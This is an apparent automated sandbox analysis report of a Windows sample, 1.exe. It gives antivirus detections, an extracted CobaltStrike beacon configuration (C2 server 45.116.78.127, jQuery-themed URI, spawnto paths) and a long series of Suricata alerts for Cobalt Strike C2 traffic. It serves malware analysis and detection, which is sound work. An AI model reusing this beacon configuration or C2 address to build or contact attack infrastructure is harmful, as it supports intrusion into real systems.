        2025-01-02T10:35:51.990056+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550029TCP
        2025-01-02T10:35:53.851213+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550030TCP
        2025-01-02T10:35:55.773742+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550031TCP
        2025-01-02T10:35:57.685613+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550032TCP
        2025-01-02T10:35:59.670445+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550033TCP
        2025-01-02T10:36:01.622123+010020330091Malware Command and Control Activity Detected45.116.78.127443192.168.2.550034TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1.exeAvira: detected
        Source: 00000000.00000003.2047591169.000002B669FB0000.00000040.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 10000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "45.116.78.127,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}
        Source: 1.exeVirustotal: Detection: 56%Perma Link
        Source: 1.exeReversingLabs: Detection: 60%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: 1.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 45.116.78.127:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: 1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49706 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49706 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49708 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49708 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49766 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49705 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49755 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49705 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49766 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49755 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49707 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49707 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49717 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49717 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49728 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49728 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49704 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49704 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49809 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49809 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49782 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49782 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49863 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49863 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49890 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49890 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49705
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49714 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49714 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49809
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49707
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49918 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49836 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49836 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49918 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49766
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49708
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49706
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49906 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49906 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50003 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50003 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50008 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50008 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49849 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49849 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49755
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50012 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50012 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50017 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50017 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49782
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50022 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50022 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50025 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50025 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49794 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50007 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50007 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49794 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49714
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49863
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49717
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49878 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49878 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50019 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50019 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49728
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49978 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49978 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50008
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50023 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50023 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50014 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50014 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50024 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50024 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50033 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50033 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50012
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49962 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49890
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49962 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50015 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50015 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50028 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49822 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50028 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49794
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50025
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49822 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50003
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49739 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49739 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50026 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50026 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50007
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49906
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50022
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50010 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50010 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50019
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49849
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50023
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49918
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50004 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50004 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50033
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50017
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50015
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49836
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49704
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50009 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50009 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50005 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50005 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49878
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49962
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50027 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50027 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50024
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50014
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50018 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50018 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49822
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50010
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50032 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50032 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49739
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49978
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50026
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50029 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50006 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50006 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50029 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49933 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49933 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50018
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50032
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49989 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50027
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50028
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50034 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50034 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50006
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49989 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50013 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50013 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50009
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50004
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50016 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50016 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50029
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50013
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50005
